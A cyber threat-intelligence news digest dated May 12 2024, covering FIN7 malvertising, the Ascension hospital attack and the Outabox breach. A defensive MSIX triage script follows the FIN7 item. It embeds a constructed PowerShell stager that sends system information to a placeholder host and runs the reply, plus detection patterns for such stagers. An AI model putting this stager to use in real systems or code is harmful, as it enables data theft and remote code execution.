Sunday, May 12 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding Proof of Concept (PoC) code, where available, for the CVEs mentioned:
A Proof of Concept (PoC) is a small exercise that tests a hypothesis or shows that an idea is viable. In the security context it demonstrates that a reported vulnerability can actually be triggered or exploited, before anyone commits to a full exploit chain or a full remediation program. Treat every linked PoC as untrusted code and run it only in an isolated lab.*
Defense Intelligence Warns of New Russian Information and Psychological Operations (IPSOs)
Bottom Line Up Front (BLUF): The Defense Intelligence of the Ministry of Defense of Ukraine has issued a warning regarding a renewed wave of Russian hostile information and psychological operations (IPSOs), aimed at undermining Ukrainian societal cohesion and manipulating public sentiment amidst intensifying front-line activities.
Analyst Comments: The alert from the Ukrainian Defense Intelligence is a sobering reminder of the non-physical fronts in the ongoing conflict between Ukraine and Russia. These operations not only aim to mislead and create discord among civilians but also target the unity and resilience of Ukrainian society against the backdrop of military aggression. This method of warfare seeks to exploit societal vulnerabilities and manipulate public perception, complicating the already challenging situation on the ground.
FROM THE MEDIA: The Defense Intelligence's statement indicates an increase in Russian efforts to divide Ukrainian society through politically charged information campaigns. These campaigns are often laced with provocations and exploit real societal issues, distorting them to serve the aggressor's objectives. The intelligence body also noted that Russian operations have broadened their targets beyond military installations to include civilian infrastructure and populations, thereby exacerbating the humanitarian situation. Ukrainian specialists in information operations are actively countering these threats, striving to bolster national solidarity and resilience amidst these challenges.
READ THE STORY: Ukranews
State-Sponsored Cyberattacks Target B.C. Government Systems: Sophisticated Attempts to Breach Digital Infrastructure Raise Concerns
Bottom Line Up Front (BLUF): The B.C. government is facing a series of sophisticated cyberattacks believed to be orchestrated by a state or state-sponsored actor. Three separate attempts to breach government systems have been made over the last month, but no sensitive information appears to have been compromised, and there has been no interruption to government operations or services. Officials are working closely with federal agencies and private sector partners to investigate the incident and determine the appropriate response.
Analyst Comments: The sustained and sophisticated nature of the cyberattacks on B.C. government systems underscores the growing threat of nation-state cyber espionage and sabotage. The attackers' ability to cover their tracks and evade detection suggests a well-resourced and persistent adversary, likely motivated by geopolitical objectives. The government's proactive investments in cybersecurity infrastructure and close collaboration with federal partners, such as the Canadian Centre for Cyber Security (CCCS), have been crucial in detecting and mitigating the impact of these attacks. The incident highlights the importance of a coordinated, multi-stakeholder approach to cybersecurity in the face of complex and evolving threats.
FROM THE MEDIA: The cyberattacks were first detected on April 10, with additional attempts identified on April 29 and May 6. The CCCS and Microsoft's Detection and Response Team (DART) were notified early in the process, and public service workers were instructed to change their passwords in response to the threat actor's activities. Premier David Eby publicly announced the attacks on May 8, after the CCCS confirmed that appropriate safeguards were in place. Investigations into the incidents are ongoing, with over 40 terabytes of data being analyzed. While the specific nation behind the attacks has not been disclosed, officials believe the level of sophistication exhibited by the attackers is consistent with that of a state actor or state-sponsored actor. The motivation behind the attacks remains unknown. The B.C. government has made significant investments in cybersecurity, dedicating $50.8 million in 2022 to update cyber-security controls and maintaining a team of 76 staff with an annual budget of $25 million to protect its digital infrastructure.
FIN7 Cybercrime Group Targets Multiple Industries with Malicious Google Ads and Backdoors
Bottom Line Up Front (BLUF): The financially motivated cybercrime group FIN7 has been conducting spear-phishing campaigns targeting various industries, including the U.S. automotive sector, using malicious Google ads and trusted brand impersonation to deliver backdoors such as Carbanak, NetSupport RAT, and DiceLoader.
Analyst Comments: FIN7's evolving tactics, which now include the use of malvertising and signed MSIX files to bypass security measures, underscore the group's adaptability and the growing sophistication of their attacks. The targeting of multiple industries and the use of trusted brand impersonation highlight the need for organizations to remain vigilant and proactively defend against these threats through a combination of technical controls, user education, and threat intelligence.
FROM THE MEDIA: In late 2023 and April 2024, FIN7 targeted the U.S. automotive industry and other sectors using spear-phishing emails containing malicious links to fake websites impersonating well-known brands such as AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet. The attackers used Google ads to lure victims to these sites, where they were prompted to download malicious MSIX files disguised as browser extensions or software installers. The MSIX files contained PowerShell scripts that collected system information and retrieved additional payloads, ultimately leading to the deployment of backdoors like Carbanak, NetSupport RAT, and DiceLoader. FIN7 used signed MSIX files and legitimate-looking pop-ups to evade detection, abusing certificates from companies like "SOFTWARE SP Z O O" and "SOFTWARE BYTES LTD." The group also employed reconnaissance tools and techniques, such as exporting Active Directory data and achieving persistence through scheduled tasks.
READ THE STORY: THN // eSentire
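The FIN7 chain above hinges on an MSIX package that launches an embedded PowerShell stager. Because an MSIX is an ordinary zip container (package identity in AppxManifest.xml, optional signature blob in AppxSignature.p7x, and an optional Package Support Framework config.json that can run a script at launch), a responder can triage one offline without installing it. The following is an added example written for this digest, not code from eSentire, THN or FIN7: it builds a constructed MSIX-shaped package in memory (the publisher name, script and URL are placeholders), reads the identity, flags PSF startScript/endScript hooks (the key names are taken from the Package Support Framework schema as this example assumes it) and scans any embedded scripts for staging indicators. Note that it reports whether a signature blob is present but does not validate it; FIN7 shipped validly signed packages, so "signed" is not "safe".

```python
"""Offline triage of an MSIX package for the PowerShell-staging pattern.
Sample package below is constructed for the demo, not a real sample."""
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET

SCRIPT_EXTS = (".ps1", ".psm1", ".bat", ".cmd", ".vbs", ".js")

# Indicator patterns for embedded scripts (heuristic, not exhaustive).
SUSPICIOUS_SCRIPT_PATTERNS = [
    (r"Invoke-Expression|\bIEX\b", "inline code execution"),
    (r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile", "downloads additional content"),
    (r"-EncodedCommand|\s-enc\b|FromBase64String", "base64-encoded payload"),
    (r"Get-ComputerInfo|Get-WmiObject|Get-CimInstance|\bwhoami\b", "system reconnaissance"),
    (r"Register-ScheduledTask|\bschtasks\b", "scheduled-task persistence"),
]

# Constructed manifest; publisher is a placeholder, not a real certificate subject.
MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">
  <Identity Name="Example.FakeInstaller" Publisher="CN=EXAMPLE SP Z O O" Version="1.0.0.0"/>
  <Applications>
    <Application Id="App" Executable="PsfLauncher64.exe" EntryPoint="Windows.FullTrustApplication"/>
  </Applications>
</Package>
"""

# Constructed stand-in for a staging script: recon, call-out, run what comes back.
STAGER_PS1 = """$info = Get-ComputerInfo | ConvertTo-Json -Compress
$resp = Invoke-WebRequest -Uri 'https://example.invalid/stage' -Method Post -Body $info -UseBasicParsing
IEX $resp.Content
"""

# PSF config.json keys (applications[].startScript.scriptPath) as this example
# assumes the Package Support Framework schema; verify against the PSF docs.
PSF_CONFIG = {"applications": [{"id": "App", "executable": "stub.exe",
              "startScript": {"scriptPath": "setup.ps1", "showWindow": False}}]}


def build_sample_msix(with_stager: bool = True) -> bytes:
    """Build a minimal MSIX-shaped zip in memory (constructed, not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", MANIFEST)
        z.writestr("stub.exe", b"MZ placeholder")
        if with_stager:
            z.writestr("config.json", json.dumps(PSF_CONFIG))
            z.writestr("setup.ps1", STAGER_PS1)
    return buf.getvalue()


def triage_msix(data: bytes) -> dict:
    """Return package identity, embedded scripts, PSF script hooks and indicator hits."""
    report = {"package_name": None, "publisher": None, "has_signature_blob": False,
              "scripts": [], "psf_script_hooks": [], "findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # A signature blob only proves someone signed it; this example does not verify it.
        report["has_signature_blob"] = "AppxSignature.p7x" in names
        if "AppxManifest.xml" in names:
            root = ET.fromstring(z.read("AppxManifest.xml"))
            for el in root.iter():
                if el.tag.rsplit("}", 1)[-1] == "Identity":  # namespace-agnostic match
                    report["package_name"] = el.get("Name")
                    report["publisher"] = el.get("Publisher")
        for name in names:
            lower = name.lower()
            if lower.endswith(SCRIPT_EXTS):
                report["scripts"].append(name)
            elif lower.endswith("config.json"):
                try:
                    cfg = json.loads(z.read(name))
                except ValueError:
                    continue
                for app in cfg.get("applications", []):
                    for hook in ("startScript", "endScript"):
                        if isinstance(app.get(hook), dict) and app[hook].get("scriptPath"):
                            report["psf_script_hooks"].append(app[hook]["scriptPath"])
        for name in report["scripts"]:
            text = z.read(name).decode("utf-8", errors="replace")
            for pattern, label in SUSPICIOUS_SCRIPT_PATTERNS:
                if re.search(pattern, text, re.IGNORECASE):
                    report["findings"].append((name, label))
    report["suspicious"] = bool(report["psf_script_hooks"] or report["findings"])
    return report


if __name__ == "__main__":
    for flag in (True, False):
        r = triage_msix(build_sample_msix(with_stager=flag))
        print(f"stager={flag}: suspicious={r['suspicious']} publisher={r['publisher']} "
              f"hooks={r['psf_script_hooks']} findings={[f[1] for f in r['findings']]}")
```

For a real file, pass `open(path, "rb").read()` to `triage_msix`. The publisher string is the pivot: a package that claims to be AnyDesk or WinSCP but carries an unfamiliar "SP Z O O" or "LTD" subject, plus a PSF script hook, is exactly the pattern described above and should go to the sandbox rather than the endpoint.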
UPDATE: China Establishes Information Support Force Amid PLA Reorganization for Modern Warfare
Bottom Line Up Front (BLUF): On April 19, 2024, the People's Liberation Army (PLA) of China officially disbanded its Strategic Support Force (SSF), which had played a pivotal role in integrating cyber, space, and electronic warfare capabilities into the PLA’s operational strategy since its inception in 2015. The dissolution led to the creation of three separate entities: the Aerospace Force (ASF), the Cyberspace Force (CSF), and the Information Support Force (ISF), now directly overseen by the Central Military Commission (CMC).
Analyst Comments: The dissolution of the SSF and the creation of specialized arms represent a strategic realignment of China's military capabilities toward a more focused and directly controlled approach. The restructuring seems aimed at enhancing operational effectiveness and reducing bureaucratic layers, potentially increasing China's ability to conduct integrated operations in the domains of cyber and space warfare. This shift may also reflect a broader intent to centralize command and increase accountability, possibly influenced by internal challenges such as corruption within the military ranks.
FROM THE MEDIA: The SSF was established in 2015, bringing together various PLA capabilities in cyber, space, and electronic warfare under one umbrella. It was responsible for significant aspects of China's military modernization and informatization efforts. However, the recent restructuring has divided the SSF into the ASF, CSF, and ISF, with each new force focusing on a specific domain of warfare. This reorganization allows for more specialized development within each domain and places critical strategic capabilities directly under the CMC's control, which could streamline decision-making and operational deployment. The formation of these new forces occurs in the context of Xi Jinping's broader military reforms, which emphasize the importance of modernizing and centralizing control over the PLA to better align with China's growing international ambitions and security concerns.
READ THE STORY: Times of India // EV // Jamestown
Ascension Hospitals Hit by Cyberattack: What Happens Next?
Bottom Line Up Front (BLUF): Ascension, one of the largest U.S. health systems, fell victim to a cybersecurity incident on Wednesday, forcing hospitals nationwide to divert emergency medical services. The health system has engaged cybersecurity firm Mandiant to assist in the investigation and remediation efforts, while some nonemergency services have been paused and patients are advised to bring written notes on symptoms and medications to their appointments.
Analyst Comments: The cyberattack on Ascension hospitals highlights the growing threat faced by the healthcare industry. Hospitals are attractive targets for ransomware groups due to their financial pressures, increased digital health offerings, and the urgent need to maintain patient care. The immediate aftermath of such an attack is complex, involving competing interests from insurance companies, law enforcement agencies, and third-party investigators. Health systems must focus on continuing care while communicating with patients to mitigate potential legal repercussions. The incident underscores the importance of investing in robust cybersecurity measures, including automated network monitoring, strict personal device usage policies, and increased federal funding to protect against cyber threats.
FROM THE MEDIA: Ascension, which encompasses 140 hospitals across 19 states, was forced to divert emergency medical services after the cybersecurity incident on Wednesday night. The health system has engaged Mandiant, a subsidiary of Google, to assist in the investigation and remediation efforts. Multiple systems, including MyChart and certain phone lines, remain down as of Thursday evening, with no timeline for restoration. In the immediate aftermath, the hospital's insurance company will investigate whether proper prevention measures were in place, while law enforcement agencies such as the FBI may get involved. Third-party firms like Mandiant are typically called in to identify the point of intrusion and what information was stolen. Delays in care can have fatal consequences, which makes health systems more likely to pay hefty ransoms.
READ THE STORY: Newsweek
Japan-AUKUS Defense Technology Ties Have Great Potential But May Take Time to Develop
Bottom Line Up Front (BLUF): A recent announcement of possible defense technology cooperation between Japan and AUKUS (the Australia, UK, US partnership) has significant potential to boost deterrence against China. However, experts believe it may take time to materialize, as Japan already has bilateral projects with each AUKUS member.
Analyst Comments: The potential Japan-AUKUS collaboration on advanced capabilities like cyber defense, AI, quantum tech, and undersea operations could provide mutual advantages by leveraging Japanese industries' strengths. Japan's focus on developing similar defense technologies aligns with AUKUS goals. However, Japan's participation is likely still in early stages, and information security is seen as a potential hurdle for Japan to overcome before joining highly sensitive AUKUS efforts. To maximize the partnership's potential, Japan and AUKUS will need to identify tech areas where collaboration can compensate for individual weaknesses, but an AUKUS-Japan alliance is considered a long-term prospect that will take time to bear fruit.
FROM THE MEDIA: AUKUS ministers said in April they are "considering cooperation with Japan" on advanced capabilities like cyber defense, AI, quantum tech, and undersea operations (AUKUS Pillar II). This could add to the "deterrent effect" against China's assertiveness and provide mutual advantages by leveraging Japanese industries' strengths in robotics and precision devices. Japan's focus on developing similar defense technologies, as outlined in its updated National Security Strategy, provides a basis for beneficial collaboration. Japan already has smooth bilateral defense projects with the U.S., UK and Australia individually, so there seems little incentive to urgently promote quadrilateral projects. Information security is seen as a potential hurdle for Japan to overcome before joining highly sensitive AUKUS efforts; Japan needs to enhance protection of confidential data.
READ THE STORY: Japan Today
Starlink Warns of Potential Service Disruptions Due to Severe Geomagnetic Storm
Bottom Line Up Front (BLUF): Starlink, Elon Musk's satellite internet company, has cautioned that its services may experience disruptions due to the most significant geomagnetic storm in two decades, caused by heightened solar activity. With Starlink owning approximately 60% of the roughly 7,500 satellites currently orbiting Earth, the company holds a dominant position in the satellite internet sector.
Analyst Comments: The ongoing geomagnetic storm, characterized by the US National Oceanic and Atmospheric Administration (NOAA) as the most severe since October 2003, poses significant challenges to Starlink's vast constellation of satellites in low Earth orbit. Although Musk reports that the satellites have withstood the strain so far, space weather of this magnitude also threatens the navigation, power and communication systems that depend on them. This incident underscores the inherent risks of satellite-based infrastructure and highlights the need for robust contingency plans to mitigate the impact of such events on critical infrastructure and services.
FROM THE MEDIA: Starlink issued a cautionary statement on Saturday regarding a potential "service disruption" stemming from Earth's exposure to the most substantial geomagnetic storm in two decades, prompted by heightened solar activity. Elon Musk communicated via the "X" platform about the significant strain experienced by Starlink's satellites amidst the geomagnetic solar storm, noting that the satellites have managed to withstand the pressure thus far. The NOAA has forecasted that the storm, the most significant of its kind since October 2003, will persist through the current day and tomorrow, posing potential risks to various services, including navigation systems, electricity networks, and satellite communication. Starlink's vast network of thousands of satellites in low Earth orbit relies on laser links between satellites to facilitate seamless data transmission at the speed of light, enabling the company to deliver internet coverage across the globe, catering to remote and underserved regions.
READ THE STORY: CNBC // MSN // MENAFN
Ukrainian Intelligence Strikes Three Industrial Facilities Inside Russia
Bottom Line Up Front (BLUF): The Main Intelligence Directorate of the Ministry of Defense of Ukraine conducted attacks on three crucial industrial facilities within Russian territory overnight on May 12, according to sources from RBC-Ukraine. The targeted facilities included the Volgograd oil refinery, the Kaluganefteprodukt oil depot in Lyudinovo, and the Novolipetsk Metallurgical Plant.
Analyst Comments: These strategic strikes by Ukrainian intelligence on key Russian industrial assets underscore the expanding scope and boldness of Ukraine's military operations, aimed at disrupting Russia's war efforts and economic infrastructure. The targeting of the Novolipetsk Metallurgical Plant, which has been linked to the production of materials for Russia's nuclear weapons and ballistic missile programs, suggests a deliberate effort to undermine Moscow's military-industrial complex. The repeated nature of these attacks also highlights the vulnerability of Russia's critical infrastructure and the effectiveness of Ukraine's intelligence-gathering and strike capabilities.
FROM THE MEDIA: The Novolipetsk Metallurgical Plant, one of Russia's largest steel plants, has been targeted by Ukrainian drones at least twice before, in February and April 2024. The plant is reported to have produced raw materials for Russian companies involved in nuclear weapons and ballistic missiles. Residents of the Volgograd region reported explosions overnight in the Chervonoyarmiysky district, which occurred at a local oil refinery and led to a fire. Online reports suggest that drones were used in the attack on the refinery. Sources from RBC-Ukraine also report that the Volgograd oil refinery, owned by Lukoil, was targeted by drones from the Main Intelligence Directorate. The primary oil processing units AVT-1 and AVT-6 were damaged, as was the control cable for the air coolers and the smokestack of furnace P-1.
READ THE STORY: Yahoo News(AU) // RBC-Ukraine
Massive Data Breach Exposes Personal Information of Over 1 Million Australians from Facial Recognition System
Bottom Line Up Front (BLUF): A major data breach linked to Outabox, an Australian facial recognition system used in bars and clubs, has compromised sensitive personal information of over 1 million individuals. The incident highlights growing privacy concerns as AI-based facial recognition becomes more widespread in public spaces.
Analyst Comments: This massive data breach underscores the severe consequences that can arise from collecting sensitive biometric data and implementing facial recognition systems without robust data protection. As these technologies proliferate in public spaces, the incident is a wake-up call about the urgent need for stronger privacy regulations, security measures, and public awareness. Companies must prioritize data security, carefully vet their IT providers, and limit unnecessary data collection and sharing. Governments should heed expert warnings and enact bold reforms to protect citizens' biometric privacy rights before irreversible damage is done.
FROM THE MEDIA: A website called "Have I Been Outaboxed" claims to have over 1 million records from an unsecured Outabox database, allegedly created by former developers in the Philippines who were not paid. The site allows visitors to check if their data was included. The exposed data allegedly includes biometric facial recognition, driver's license scans, signatures, club membership details, addresses, birthdates, phone numbers, club visit timestamps, and slot machine usage. Outabox deployed facial recognition kiosks in venues to scan visitors and check temperatures during the Covid-19 pandemic. The kiosks could also identify problem gamblers who self-excluded. Australian police are investigating the breach and have arrested a 46-year-old Sydney man expected to be charged with blackmail. Federal agencies are also involved. ClubsNSW, the peak body for licensed clubs in New South Wales, has notified members that 16 clubs using the compromised IT provider may have had patron data exposed. Some clubs have posted privacy breach notices.
READ THE STORY: The Register // Wired // Tech Times
Sopra Steria, the parent company of the hacked MoD supplier, holds significant government contracts across various departments
Bottom Line Up Front (BLUF): Sopra Steria, through its subsidiary SSCL, which was recently targeted in a cyberattack suspected to be conducted by Chinese operatives, has extensive contracts totaling £1.6 billion across various UK government sectors including the NHS, MoD, and National Savings & Investments.
Analyst Comments: The cyberattack on SSCL underscores a significant security breach that could have broader implications for UK national security, given the range of sensitive roles the company holds across government departments. This incident highlights potential vulnerabilities in the supply chain security of critical government infrastructure, which could be exploited to access a wide array of sensitive information. The fact that SSCL handles payroll data for the MoD raises concerns about the exposure of personal information of military personnel, which could be leveraged in espionage operations.
FROM THE MEDIA: Sopra Steria's subsidiary, SSCL, was reported to be the target of the cyberattack, with hackers gaining unauthorized access to the payroll records of 270,000 military personnel, potentially compromising their personal information. The UK's Defense Secretary, Grant Shapps, confirmed the breach and apologized for the incident, which he declared "should not have happened." This breach highlights the increasing threat of state-sponsored cyberattacks and the need for enhanced cybersecurity measures within government contractors handling sensitive data. SSCL's broad portfolio with the government, with contracts worth £1.6 billion in total, underscores the extent of the data that could be at risk.
READ THE STORY: Express
The Escalating Militarization of Chinese Society
Bottom Line Up Front (BLUF): China has introduced a new law mandating military training for middle school students and reinforcing national defense education, marking a significant step in the militarization of Chinese society—a trend reminiscent of the Mao Zedong era. Additionally, Chinese companies, including major state-owned enterprises, are establishing militia units, indicating a deepening integration of military preparedness into civilian sectors.
Analyst Comments: The introduction of mandatory military training for children as young as 12 indicates a strategic pivot towards ingraining military discipline and patriotism from an early age. This policy could be driven by multiple factors including a perceived need to bolster military recruitment and instill a robust nationalist ethos among the youth. This move also mirrors broader global trends where nations are intensifying their defense mechanisms in educational curriculums amidst growing geopolitical tensions.
FROM THE MEDIA: China's revised 'law on national defense education' mandates military drills and defense studies starting in middle school, intensifying the militaristic grooming of the youth. This push extends into the corporate sector, with firms like the Industrial and Commercial Bank of China forming militias equipped with uniforms and weapons. These moves are part of a broader national strategy to secure and fortify the nation against both external and internal threats, reflecting President Xi Jinping’s heightened focus on national security across all sectors of Chinese society.
READ THE STORY: The Spectator
Items of interest
PLAN Warships Navigate Japanese Waters Amid Tri-Nation Information Warfare Agreement
Bottom Line Up Front (BLUF): A pair of Chinese frigates and an intelligence ship recently navigated waters around Japan's southwest islands and through the Miyako Strait, escalating regional tensions. Concurrently, Japan, the United States, and Australia have strengthened their collaboration on information warfare, highlighting the strategic importance of intelligence and non-kinetic operations in the Indo-Pacific region's complex security environment.
Analyst Comments: The navigation of People's Liberation Army Navy (PLAN) warships around key Japanese islands, particularly near disputed territories such as the Senkaku Islands, serves multiple strategic purposes for China. It demonstrates China's naval capability and asserts its claims over contested areas. The timing of these movements with the tri-nation information warfare memorandum suggests a multifaceted approach to regional dominance, combining physical naval presence with enhanced capabilities in cyber and space domains. This development indicates a heightened state of strategic competition in the region, where information warfare capabilities are becoming as crucial as traditional military power.
FROM THE MEDIA: On May 10, 2024, Japanese defense forces tracked two PLAN frigates, CNS Changzhou and CNS Luan, as they maneuvered through international but sensitive waters near Japan's southwest islands, a route frequently used by the PLAN to access the Pacific Ocean. This operation coincides with the sighting of the Dongdiao-class surveillance ship Dubhe in the Miyako Strait, a key strategic channel between Miyako Island and Okinawa. These movements are part of a broader pattern of Chinese naval activity around Japanese waters, often perceived as efforts to test Japan's response and resolve in the face of Chinese military activities.
READ THE STORY: USNI
Documentary: 'Generation Blue Water' (Video) *CGTN*
FROM THE MEDIA: "Generation Blue Water" is a groundbreaking CGTN documentary that explores one of the world's rising naval powers — the People's Liberation Army Navy. The film takes viewers aboard China's two operational aircraft carriers, the Liaoning and Shandong, as well as its most advanced destroyer, the Type 055, to see the intensive training for blue water operations.
The Chinese Navy: Copy and Pasted (Video)
FROM THE MEDIA: China's PLA Navy has its own set of objectives, strategy and force composition, distinct from those of the other two major naval powers, the US and Russia.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.